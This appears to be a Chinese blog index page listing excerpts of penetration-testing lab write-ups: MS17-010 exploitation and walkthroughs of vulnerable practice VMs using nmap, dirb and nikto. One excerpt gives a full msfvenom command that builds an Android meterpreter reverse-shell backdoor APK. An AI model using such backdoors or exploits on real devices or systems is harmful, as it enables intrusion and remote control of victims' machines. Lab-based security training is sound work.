渗透实验基础

使用MSFVENOM生成后门 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.189.184 LPORTS=4444 >1.apk LHOTS = 攻击源主机IP LPORTS = 默认端口号 后门漏洞 -l─# msfvenom -p android/meterpreter/reverse_tcp LHOST=1...

发布于 渗透测试

渗透实验基础

Windows 实验使用 ms17-010漏洞 使用环境 测试:Windows7 64 攻击:kali linux 基本步骤 1.保持宿主机和肉鸡可以ping通 扫描手段如下: 漏扫 -lsf6 > search ms17_010 Matching Modules ================ # Name ...

发布于 渗透测试

MrRoot渗透测试

渗透测试实验 MrRobot 主机,一切都是未知,只知道是一台服务器 准备工作: 修改虚拟机网络为 NAT 模式,与 kali 在同一局域网络中 涉及的工具 netdiscover,nmap,dirb,nikto,nc 详细步骤 第 1 步: 使用工具扫描主机的 IP 以及开放的端口 netdiscover 或者使用 netdiscover -i eth0 -r 192.168.131...

发布于 渗透测试

WebDeveloper 靶机渗透

WebDeveloper 靶机渗透 WebDeveloper 靶机 确定主机 ip arp-scan -l 信息收集 主机、端口扫描 root@kali:~# nmap -sS -Pn -A -p- 192.168.220.167 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 23:31 EDT Nmap scan ...

发布于 渗透测试

Loly 靶机渗透

Loly 靶机渗透 Loly 靶机,修改主机网络模式为 NAT 1.确定主机 ip arp-scan -l 2.信息收集 主机、端口、服务版本扫描 扫描结果 端口 信息 80/tcp Nginx 1.10.3((Ubuntu)) 80 端口网站 就一个页面,其他都点不开 查看源码,没发现什么 网站目录扫描 dirb http://192.168.220....

发布于 渗透测试

driftingblues9 靶机渗透

driftingblues9 靶机渗透 driftingblues9 靶机,修改主机网络模式为 NAT 1. 1. 信息收集 1.1 发现主机 IP arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:c7:c5:6f, IPv4: 192.168.220.150 Starting arp-scan 1.9.7 with ...

发布于 渗透测试

Lampiao靶机渗透

Lampiao 靶机渗透 Lampiao 靶机 确定主机 ip netdiscover 信息收集 主机、端口扫描 nmap -sS -Pn -A -p- 192.168.220.171 Starting Nmap 7.80 -lroot@kali:~# nmap -sS -Pn -A -p- 192.168.220.171 Starting Nmap ( https://nmap....

发布于 渗透测试